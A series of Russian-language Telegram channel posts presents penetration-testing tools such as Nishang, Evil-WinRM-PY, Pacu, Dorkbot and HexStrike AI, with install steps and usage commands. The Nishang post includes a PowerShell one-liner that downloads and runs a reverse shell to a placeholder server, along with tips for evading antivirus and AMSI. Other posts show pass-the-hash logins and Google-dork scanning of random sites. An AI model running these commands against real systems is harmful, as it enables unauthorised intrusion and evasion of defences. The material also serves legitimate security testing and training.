🐒 Infection Monkey — open source платформа эмуляции противника для тестирования устойчивости сети к реальным атакам
🧾 Основные возможности Infection Monkey
📉 Два ключевых компонента: Agent — сетевой «червь», который заражает машины, ворует данные и доставляет полезную нагрузку, и Monkey Island — сервер управления и визуализации хода атаки.
📉 Поддерживает множество техник распространения: перебор предопределённых паролей, логические эксплойты, кражу учётных данных через Mimikatz.
🖱 Использует разные векторы эксплуатации: SSH, SMB, RDP, WMI, Log4Shell и другие RCE‑уязвимости, что позволяет моделировать современные сценарии компрометации.
🔎 Как работает эмуляция «безопасного малвара»
➡️ Monkey Agent после запуска сканирует сеть, ищет активные хосты, выполняет fingerprinting и подбирает под них подходящие методы атаки.
➡️ Конфигурация агента позволяет приближенно повторять поведение реального малваря, но без разрушительных действий, чтобы проверять детект и реакцию в безопасном режиме.
➡️ Monkey Island собирает результаты, строит карту инфицирования и формирует отчёты, которые помогают видеть слабые места сегментации, аутентификации и мониторинга.
⬇️ Установка и запуск
➡️ Базовый сетап
▶️ Infection Monkey распространяется в виде готовых пакетов и образов; для быстрого старта можно скачать сборку с сайта/репозитория и следовать гайдам из документации (Setup / Getting Started).
▶️ Поддерживаются разные платформы и варианты развёртывания Monkey Island и агента; подробные инструкции есть в официальном документационном хабе.
➡️ Тестирование и отчётность
▶️ После развёртывания Monkey Island настраивается сценарий: от какой машины стартует агент, какие техники ему доступны и какие сегменты сети можно трогать.
▶️ По итогам симуляции формируются карты атак и детальные security‑отчёты, которые можно использовать как основу для укрепления контроля доступа, сегментации и SOC‑процессов.
#security #bas #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Infection Monkey имитирует поведение вредоносного ПО в контролируемой среде: агент сам распространяется по сети, пытается взламывать узлы и отправляет телеметрию на сервер Monkey Island для наглядных карт распространения и отчётов. Такой «безопасный вирус» помогает видеть реальные вектора атак и проверять, насколько хорошо срабатывают средства защиты и процессы.
#security #bas #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍9🔥9🤔3🙊2
⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды».
⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence).
⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS.
⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью.
☁️ Базовый сценарий использования
➡️ Импорт всех скриптов в сессию:
Или dot‑sourcing отдельных:
➡️ Помощь по скриптам:
➡️ In‑memory запуск с удалённого хоста (через web shell/meterpreter):
⬇️ Установка и запуск
🔔 Быстрый старт
- Клонировать репозиторий и импортировать в PowerShell v3+:
- Для обхода AV использовать Invoke-Encode:
Затем запустить encodedcommand на цели:
🔔 Обход AMSI и AV
➡️ Скрипты часто детектятся, но работают in‑memory; для AMSI в Win10+ — используйте Invoke-AmsiBypass или кастомизацию имён функций/параметров.
➡️ Для non‑PowerShell шеллов — encodedcommand с вызовом экспортированной функции внутри скрипта.
#powershell #redteam #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Import-Module .\nishang.psm1
Или dot‑sourcing отдельных:
. C:\nishang\Gather\Get-Information.ps1
Get-Information
Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию).powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>- Клонировать репозиторий и импортировать в PowerShell v3+:
git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1
- Для обхода AV использовать Invoke-Encode:
. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand
Затем запустить encodedcommand на цели:
powershell -e <encoded>#powershell #redteam #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍6🔥5
WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов
👉 WAFW00F использует трехуровневый подход для определения WAF:
▶️ Пассивный анализ - отправляет обычный HTTP-запрос и ищет сигнатуры в заголовках (например, X-Protected-By, Server), cookies или HTML-коде. Многие WAF оставляют уникальные следы
▶️ Активное тестирование - если пассивный анализ не сработал, отправляет подозрительные запросы (инъекции SQL, XSS). Анализирует ответы на блокировку (специальные страницы ошибок, коды состояния (403, 406) или заголовки)
▶️ Эвристический анализ - если первые два шага не дали результата, применяет алгоритмы к собранным ответам, чтобы определить, реагирует ли система безопасности на зондирование.
⬇️ Установка
Проверка
⏺️ Базовая проверка
При успешном обнаружении вывод будет содержать информацию о производителе и модели WAF.
⏺️ Просмотр полного списка детектируемых систем защиты
Эта команда выводит обширную таблицу с именами WAF и их производителями, что полезно для ознакомления с возможностями инструмента.
⏺️ Проверка нескольких целей и вывод в файл
Флаг -o (или --output) позволяет экспортировать результаты в файл. Формат (JSON, CSV, plain text) определяется по расширению файла (.json, .csv, .txt).
⏺️ Агрессивное тестирование для выявления всех возможных WAF
Ключ -a (--findall) заставляет инструмент продолжить тестирование даже после первого успешного совпадения, чтобы найти все возможные WAF. Флаг -v увеличивает детализацию вывода.
#WAFW00F #tool #pentest #WAF
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.
База сигнатур включает более
150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)
.
pipх install wafw00f
Проверка
wafw00f -h
wafw00f https://example.org
При успешном обнаружении вывод будет содержать информацию о производителе и модели WAF.
wafw00f -l
Эта команда выводит обширную таблицу с именами WAF и их производителями, что полезно для ознакомления с возможностями инструмента.
wafw00f https://site1.com http://site2.net -o results.json
Флаг -o (или --output) позволяет экспортировать результаты в файл. Формат (JSON, CSV, plain text) определяется по расширению файла (.json, .csv, .txt).
wafw00f https://target.com -a -v
Ключ -a (--findall) заставляет инструмент продолжить тестирование даже после первого успешного совпадения, чтобы найти все возможные WAF. Флаг -v увеличивает детализацию вывода.
#WAFW00F #tool #pentest #WAF
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤9🔥7
🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности
Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.
🎇 Основные возможности Pacu
📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами.
📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов.
🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования.
💻 Базовый сценарий использования
▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения.
▶️ Через команду
▶️ Команды
⬇️ Установка и запуск
⏺️ Установка Pacu и зависимостей:
⏺️ При первом запуске задать имя сессии и затем добавить AWS‑ключи командой
2️⃣ Запуск через Docker
⏺️ Запуск с дефолтным entrypoint:
⏺️ Для работы с реальными AWS‑кредитами можно примонтировать локальные
#aws #security #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.
set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом. list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1).pip3 install -U pip
pip3 install -U pacu
pacu
set_keys по интерактивным подсказкам. docker run -it rhinosecuritylabs/pacu:latest
~/.aws в контейнерdocker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest
#aws #security #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍6🔥5👎1
Dorkbot: Автоматизированный инструмент для поиска уязвимостей через поисковые системы
👉 Dorkbot функционирует на основе модульной системы, состоящей из двух ключевых компонентов:
▶️ Индексаторы (Indexers) - модули, отвечающие за сбор списка целей (URL-адресов). Они выполняют поисковые запросы через различные источники
▶️ Сканеры (Scanners) - модули, которые выполняют непосредственно проверку безопасности каждой собранной цели на наличие уязвимостей
⬇️ Установка
Проверка
⏺️ Выполним поиск целей через Google Custom Search API (индексатор google_api) и сразу сканируем 10 случайных целей из найденных с помощью сканера Wapiti
▶️ -i google_api и -o - активируют индексатор Google API и передают ему необходимые аргументы (ключ, ID поисковой системы и поисковый запрос)
▶️ -s wapiti - указывает сканер для проверки уязвимостей
▶️ --count 10 - ограничивает обработку (индексацию и/или сканирование) 10 целями
▶️ --random - обеспечивает случайный порядок выбора целей для обработки, что полезно для выборки
▶️ --log scan_session.log - перенаправляет вывод логов в указанный файл для последующего анализа
⏺️ Эта команда демонстрирует работу с базой данных целей и блоклистом без запуска сканирования
▶️ -d /opt/security/dorkbot.db - указывает путь к файлу базы данных SQLite
▶️ --list-targets --unscanned-only - выводит список всех целей, которые еще не были отсканированы
▶️ --add-blocklist-item - добавляет правила в блоклист. В данном случае блокируются все URL, содержащие подстроку logout (регулярное выражение), и все цели с хостом admin.example.com
▶️ --prune - критически важная операция, которая применяет правила блоклиста и систему отпечатков (fingerprinting) к существующей базе данных.
#dorkbot #tool #pentest #URL
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Dorkbot — модульный инструмент командной строки с открытым исходным кодом, предназначенный для автоматизации поиска уязвимостей на веб-ресурсах, обнаруженных через публичные поисковые системы или архивы интернета (Common Crawl и Wayback Machine). Его архитектура разделяет процессы сбора целей (индексирования) и их проверки (сканирования), что обеспечивает гибкость и контроль на каждом этапе безопасности.
Все обнаруженные цели сохраняются в базе данных, что позволяет управлять ими, отслеживать статус проверки и избегать дублирования. После сканирования формируется детальный отчет в формате
JSON
, содержащий информацию о найденных уязвимостях.
pipх install dorkbot
Проверка
dorkbot -h
dorkbot -i google_api -o key=YOUR_API_KEY -o engine=YOUR_CSE_ID -o query="inurl:view.php?id=" -s wapiti --count 10 --random --log scan_session.log
dorkbot -d /opt/security/dorkbot.db --list-targets --unscanned-only --add-blocklist-item "regex:.*logout.*" --add-blocklist-item "host:admin.example.com" --prune
Цели, соответствующие новым правилам блоклиста, будут помечены как отсканированные (или удалены, если добавить флаг -m), а дубликаты на основе отпечатков будут исключены из очереди на сканирование
#dorkbot #tool #pentest #URL
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍7🔥5
BPF Linker: Инструмент статической линковки для современных BPF-программ
В отличие от традиционных линкеров, bpf-linker оперирует не машинным кодом, а LLVM-биткодом. Это позволяет выполнять оптимизацию на уровне промежуточного представления и генерировать эффективный байт-код для виртуальной машины BPF.
Инструмент принимает на вход:
▶️ Файлы биткода (.bc)
LLVM IR (.ll)
▶️ Объектные файлы со встроенным биткодом (.o)
▶️ Статические библиотеки (.a)
▶️ На выходе формируется готовый объектный файл BPF, который может быть загружен в ядро
⬇️ Установка
Проверка
⏺️ Оптимизация для устаревших ядер (v1/v2)
Объектный файл legacy.o, совместимый с ядрами 4.x–5.x. Принудительное встраивание функций и развертка циклов позволяют выполнять сложную логику там, где отсутствует поддержка вызовов функций и циклов.
⏺️ Отладка и анализ
Команда выполняет линковку входного файла input.o в output.o, сохраняя детальный лог в link.log и финальное LLVM-представление в final.ll. Флаг --log-level debug обеспечивает максимальную детализацию, --dump-module — анализ промежуточного кода. Позволяет диагностировать ошибки линковки, проверять корректность оптимизаций и исследовать генерируемый BPF-код.
⏺️ Минимизация размера
Данная команда выполняет линковку всех объектных файлов с агрессивной оптимизацией по размеру (-O z) и отключением экспорта встроенных функций работы с памятью (--disable-memory-builtins). Результирующий файл minimal.o имеет минимально возможный размер. Критически важно для систем с жесткими лимитами на размер загружаемых BPF-программ.
👉 Преимущества инструмента
- Полноценная статическая линковка для BPF-модулей
- Поддержка CO-RE через BTF-генерацию
- Обратная совместимость с ограничениями старых ядер
#bpflinker #tool #pentest #LLVM
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
BPF Linker (bpf-linker) — специализированное решение для статической линковки объектных файлов BPF-программ, разработанное в рамках экосистемы Aya. Инструмент ориентирован на упрощение сборки современных BPF-приложений при сохранении совместимости с устаревшими, более ограничивающими версиями ядра.
В отличие от традиционных линкеров, bpf-linker оперирует не машинным кодом, а LLVM-биткодом. Это позволяет выполнять оптимизацию на уровне промежуточного представления и генерировать эффективный байт-код для виртуальной машины BPF.
Инструмент принимает на вход:
LLVM IR (.ll)
sudo apt install bpf-linker
Проверка
bpf-linker -h
bpf-linker --cpu v2 --unroll-loops --ignore-inline-never -o legacy.o *.o
Объектный файл legacy.o, совместимый с ядрами 4.x–5.x. Принудительное встраивание функций и развертка циклов позволяют выполнять сложную логику там, где отсутствует поддержка вызовов функций и циклов.
bpf-linker --dump-module ./final.ll --log-level debug --log-file ./link.log -o output.o input.o
Команда выполняет линковку входного файла input.o в output.o, сохраняя детальный лог в link.log и финальное LLVM-представление в final.ll. Флаг --log-level debug обеспечивает максимальную детализацию, --dump-module — анализ промежуточного кода. Позволяет диагностировать ошибки линковки, проверять корректность оптимизаций и исследовать генерируемый BPF-код.
bpf-linker -O z --disable-memory-builtins -o minimal.o *.o
Данная команда выполняет линковку всех объектных файлов с агрессивной оптимизацией по размеру (-O z) и отключением экспорта встроенных функций работы с памятью (--disable-memory-builtins). Результирующий файл minimal.o имеет минимально возможный размер. Критически важно для систем с жесткими лимитами на размер загружаемых BPF-программ.
- Полноценная статическая линковка для BPF-модулей
- Поддержка CO-RE через BTF-генерацию
- Обратная совместимость с ограничениями старых ядер
#bpflinker #tool #pentest #LLVM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍6🔥5
Evil-WinRM-PY: Инструмент для удаленного администрирования Windows через WinRM
👉 Базовые операции
- Интерактивная командная оболочка с поддержкой истории команд
- Загрузка и выгрузка файлов с индикацией прогресса и проверкой MD5
- Автодополнение локальных и удаленных путей (включая пути с пробелами)
👉 Расширенное взаимодействие с PowerShell
- Загрузка функций из локальных PS1-скриптов в сессию
- Выполнение локальных PowerShell-сценариев на удаленном узле
- Загрузка DLL-библиотек в память удаленного процесса PowerShell
- Выполнение EXE-файлов, загружаемых непосредственно в память
⬇️ Установка
Базовое подключение с аутентификацией по паролю
Подключение через SSL с использованием Pass-the-Hash
Kerberos-аутентификация с кастомным SPN
Тестирование на проникновение (авторизованное)
Позволяет проверить устойчивость инфраструктуры к атакам Pass-the-Hash, оценить эффективность политик паролей и корректность конфигурации WinRM
🎇 Ограничения и требования
- Необходимость явного разрешения на использование
- Требуется активированный WinRM на целевой системе
- Kerberos-аутентификация требует дополнительной настройки на стороне клиента
- SSL-сертификаты должны быть доверенными или принятыми вручную
#evilwinrmpy #tool #pentest #NTLM #PowerShell #Kerberous
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Evil-WinRM-PY — кроссплатформенная Python-реализация Evil-WinRM для удаленного выполнения команд на узлах Windows через WinRM. Предоставляет интерактивную оболочку с функциями передачи файлов, загрузки скриптов/DLL и выполнения EXE в памяти. Поддерживает NTLM, Pass-the-Hash, сертификаты и Kerberos. Инструмент разработан преимущественно для Linux, является стандартным решением в Kali Linux, устанавливается через pip и включает штатную поддержку Kerberos через пакеты libkrb5-dev.
- Интерактивная командная оболочка с поддержкой истории команд
- Загрузка и выгрузка файлов с индикацией прогресса и проверкой MD5
- Автодополнение локальных и удаленных путей (включая пути с пробелами)
- Загрузка функций из локальных PS1-скриптов в сессию
- Выполнение локальных PowerShell-сценариев на удаленном узле
- Загрузка DLL-библиотек в память удаленного процесса PowerShell
- Выполнение EXE-файлов, загружаемых непосредственно в память
sudo apt install evil-winrm-pyПроверка
evil-winrm-py -h
Базовое подключение с аутентификацией по паролю
evil-winrm-py -i 192.168.1.100 -u Administrator -p P@ssw0rd
Подключение через SSL с использованием Pass-the-Hash
evil-winrm-py -i dc01.domain.local -u Administrator -H 8843f4f67bcc0c6e6b5c6d7e8f9a0b1c --ssl
Аутентификация с применением сертификатовevil-winrm-py -i 10.10.10.50 -u user@domain.local --priv-key-pem ./key.pem --cert-pem ./cert.pem
Kerberos-аутентификация с кастомным SPN
Администрирование серверной инфраструктуры
evil-winrm-py -i srv02.domain.local -u user@DOMAIN.LOCAL -k --spn-prefix WSMAN --spn-hostname srv02.domain.local
evil-winrm-py -i srv01.corp.local -u CORP\admin -p P@ssw0rd --sslОбеспечивает безопасное удаленное управление серверами Windows с шифрованием трафика. Используется для выполнения регламентных задач, диагностики и мониторинга состояния систем.
Тестирование на проникновение (авторизованное)
evil-winrm-py -i 10.0.0.25 -u Administrator -H 8843f4f67bcc0c6e6b5c6d7e8f9a0b1c
Позволяет проверить устойчивость инфраструктуры к атакам Pass-the-Hash, оценить эффективность политик паролей и корректность конфигурации WinRM
- Необходимость явного разрешения на использование
- Требуется активированный WinRM на целевой системе
- Kerberos-аутентификация требует дополнительной настройки на стороне клиента
- SSL-сертификаты должны быть доверенными или принятыми вручную
#evilwinrmpy #tool #pentest #NTLM #PowerShell #Kerberous
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍8🔥7
В этой статье познакомимся с некоторыми известными и опенсорсными веб-приложениями, которые специально содержат уязвимостями и предназначены для обучения специалистов и тестирования инструментов безопасности.
➡️OWASP Juice Shop
Уязвимое веб-приложение от компании OWASP, реализованное на JavaScript и TypeScript. Juice Shop содержит более 100 различных уязвимостей, таких как SQL-инъекции, межсайтовый скриптинг (XSS), межсайтовый скриптинг с использованием CSRF (Cross-Site Scripting), переполнение буфера и многое другое.
docker pull bkimminich/juice-shop
docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop
Далее приложение будет доступно по адресу
http://localhost:3000. Рекомендуемые системные требования: 384 МБ ОЗУ, 800 МБ свободного места на диске.➡️DVWA (Damn Vulnerable Web Application)
Веб-приложение на PHP/MariaDB, намеренно разработанное как уязвимое.
Цель DVWA — отработать некоторые из наиболее распространенных уязвимостей в веб-приложениях с разным уровнем сложности и простым и понятным интерфейсом. В этом программном обеспечении есть как задокументированные, так и незадокументированные уязвимости.
git clone https://github.com/digininja/DVWA.git
cd DVWA
docker compose up -d
Далее приложение будет доступно по адресу
http://localhost:4280.➡️OWASP WebGoat
Еще одно намеренно небезопасное веб-приложение от OWASP для тестирования уязвимостей, часто встречающиеся в приложениях на Java.
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 webgoat/webgoat
Для некоторых уроков требуется, чтобы контейнер работал в том же часовом поясе. Это решается с помощью переменной среды TZ:
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/webgoat
Далее приложение будет доступно по адресу
http://www.webgoat.local:8080/WebGoat/.#tools #web #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤9🔥6❤🔥2
Cloudlist: Инструмент для сбора активов из облачных провайдеров
👉 Возможности
- Поддержка множества провайдеров (AWS, GCP, Azure, DigitalOcean, Linode, Alibaba, Cloudflare, Fastly, Heroku, Kubernetes и другие)
- Гибкая фильтрация по провайдерам, сервисам, идентификаторам
- Несколько форматов вывода (JSON, plain text, stdout для интеграции с другими инструментами)
- Исключение приватных IP-адресов при необходимости
- Простое добавление новых провайдеров
- Два подхода к GCP (организация через Asset API или проекты через сервисные API)
⬇️ Установка
Проверка
Конфигурация Cloudlist использует YAML-файл конфигурации для хранения учетных данных провайдеров. По умолчанию:
⏺️ Пример базовой конфигурации
⏺️ Расширенная конфигурация для GCP (организация через Asset API)
⏺️ Получение всех активов из всех настроенных провайдеров
⏺️ Получение активов только от конкретных провайдеров
⏺️ Тихий режим (только результаты, без лишнего вывода)
⏺️ Подробный вывод с расширенными метаданными
⏺️ Инвентаризация всех EC2-инстансов в AWS
⏺️ Получение всех доменных имен из Cloudflare
⏺️ Поиск публичных IP-адресов во всех облаках
⏺️ Интеграция с httpx для проверки HTTP-сервисов
🔎 Ограничения и требования
- Требуются корректно настроенные ключи доступа для каждого провайдера
- Требует включения Cloud Asset Inventory и соответствующих разрешений на уровне организации
- Необходимы права на чтение ресурсов (рекомендуется использовать read-only ключи)
- Массовые запросы могут учитываться в квотах провайдеров
#Cloudlist #tool #pentest #Asset
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Cloudlist — утилита с открытым исходным кодом от projectdiscovery, предназначенная для получения перечня активов (Assets) из множества облачных провайдеров. Инструмент ориентирован на использование командами защиты (blue team) для улучшения управления поверхностью атаки (Attack Surface Management) путем поддержания централизованного списка активов в различных облачных средах с минимальными усилиями по настройке.
- Поддержка множества провайдеров (AWS, GCP, Azure, DigitalOcean, Linode, Alibaba, Cloudflare, Fastly, Heroku, Kubernetes и другие)
- Гибкая фильтрация по провайдерам, сервисам, идентификаторам
- Несколько форматов вывода (JSON, plain text, stdout для интеграции с другими инструментами)
- Исключение приватных IP-адресов при необходимости
- Простое добавление новых провайдеров
- Два подхода к GCP (организация через Asset API или проекты через сервисные API)
git clone https://github.com/projectdiscovery/cloudlist.git
cd cloudlist/cmd/cloudlist
go build .
sudo mv cloudlist /usr/local/bin/
Проверка
cloudlist -h
Конфигурация Cloudlist использует YAML-файл конфигурации для хранения учетных данных провайдеров. По умолчанию:
~/.config/cloudlist/provider-config.yaml#AWS
- id: aws-prod
aws:
access-key: AKIA...
secret-key: ...
region: us-east-1
#GCP
- id: gcp-prod
gcp:
service-account-json: /path/to/sa-key.json
project: my-project-id
#Azure
- id: azure-dev
azure:
subscription-id: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
client-id: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
client-secret: ...
tenant-id: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
- id: gcp-org
gcp:
service-account-json: /path/to/org-sa.json
asset-discovery: true #использование Asset API
organization-id: "1234567890" #ID организации
projects: #ограничение проектами (опционально)
- project-1
- project-2
cloudlist
cloudlist -p aws,gcp,azure
cloudlist -silent
cloudlist -p aws -extended-metadata -v
cloudlist -p aws -s ec2 -json | jq '.'
cloudlist -p cloudflare -s domain -host
cloudlist -s publicip -ep -silent > public_ips.txt
cloudlist -p aws,gcp -s ec2,compute -host | httpx -title -status-code
- Требуются корректно настроенные ключи доступа для каждого провайдера
- Требует включения Cloud Asset Inventory и соответствующих разрешений на уровне организации
- Необходимы права на чтение ресурсов (рекомендуется использовать read-only ключи)
- Массовые запросы могут учитываться в квотах провайдеров
#Cloudlist #tool #pentest #Asset
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤5🔥4
HexStrike AI: Платформа для автоматизации кибератак с использованием искусственного интеллекта
HexStrike AI реализует многоагентную архитектуру, включающую компоненты:
▶️ Автономные AI-агенты, выполняющие специализированные задачи безопасности
▶️ Механизм интеллектуального принятия решений на основе анализа контекста
▶️ Система управления уязвимостями с приоритизацией угроз
▶️ Интеграция с внешними инструментами через MCP (Modular Connector Protocol)
⬇️ Установка
Установка зависимостей вручную
Проверка
HexStrike AI состоит из двух основных компонентов:
▶️ hexstrike_server — центральный API-сервер, реализующий основную логику и взаимодействие с AI-агентами
▶️ hexstrike_mcp — клиент для подключения к серверу через MCP-протокол
⏺️ Запуск сервера
По умолчанию сервер запускается на
⏺️ Параметры сервера
Опции:
- --debug — включение отладочного режима
- --port PORT — указание порта для API-сервера (по умолчанию 8888)
⏺️ Запуск MCP-клиента
⏺️ Параметры клиента
Опции:
- --server SERVER — URL API-сервера HexStrike AI (по умолчанию http://127.0.0.1:8888)
- --timeout TIMEOUT — таймаут запроса в секундах (по умолчанию 300)
-
⏺️ Базовый запуск для анализа целевой системы
🔎 HexStrike AI построен на клиент-серверной архитектуре
▶️ Серверный компонент:
- Управляет пулом процессов (по умолчанию 4 воркера)
- Реализует адаптивный AI-движок принятия решений
- Обеспечивает интеграцию с более чем 150 модулями
- Поддерживает унифицированный интерфейс операций
▶️ Клиентский компонент:
- Взаимодействует с сервером через HTTP API
- Поддерживает настраиваемые таймауты для длительных операций
- Обеспечивает отладочный режим для диагностики
#HexStrike-AI #tool #pentest #MCP
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
HexStrike AI представляет собой специализированную платформу для автоматизации задач кибербезопасности, построенную на архитектуре мультиагентного искусственного интеллекта. Инструмент предназначен для автоматизации разведки, анализа уязвимостей и проведения тестов на проникновение, ориентирован на специалистов по безопасности, исследователей уязвимостей и участников программ bug bounty.
HexStrike AI реализует многоагентную архитектуру, включающую компоненты:
Платформа включает более
150
интегрированных модулей, охватывающих все этапы тестирования на проникновение: от разведки до эксплуатации уязвимостей.
sudo apt update
sudo apt install hexstrike-ai
Установка зависимостей вручную
pip install mitmproxy aiohttp beautifulsoup4 flask mcp psutil pwntools requests selenium
Проверка
hexstrike_server -h
hexstrike_mcp -h
HexStrike AI состоит из двух основных компонентов:
hexstrike_server
По умолчанию сервер запускается на
127.0.0.1:8888 с выводом информационного баннера и статуса работыhexstrike_server --help
Опции:
- --debug — включение отладочного режима
- --port PORT — указание порта для API-сервера (по умолчанию 8888)
hexstrike_mcp --server http://127.0.0.1:8888
hexstrike_mcp -h
Опции:
- --server SERVER — URL API-сервера HexStrike AI (по умолчанию http://127.0.0.1:8888)
- --timeout TIMEOUT — таймаут запроса в секундах (по умолчанию 300)
-
--debug — включение отладочного логирования#терминал 1: запуск сервера
hexstrike_server --debug
#терминал 2: подключение клиента
hexstrike_mcp --server http://127.0.0.1:8888 --timeout 600
- Управляет пулом процессов (по умолчанию 4 воркера)
- Реализует адаптивный AI-движок принятия решений
- Обеспечивает интеграцию с более чем 150 модулями
- Поддерживает унифицированный интерфейс операций
- Взаимодействует с сервером через HTTP API
- Поддерживает настраиваемые таймауты для длительных операций
- Обеспечивает отладочный режим для диагностики
#HexStrike-AI #tool #pentest #MCP
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🔥4😁1🐳1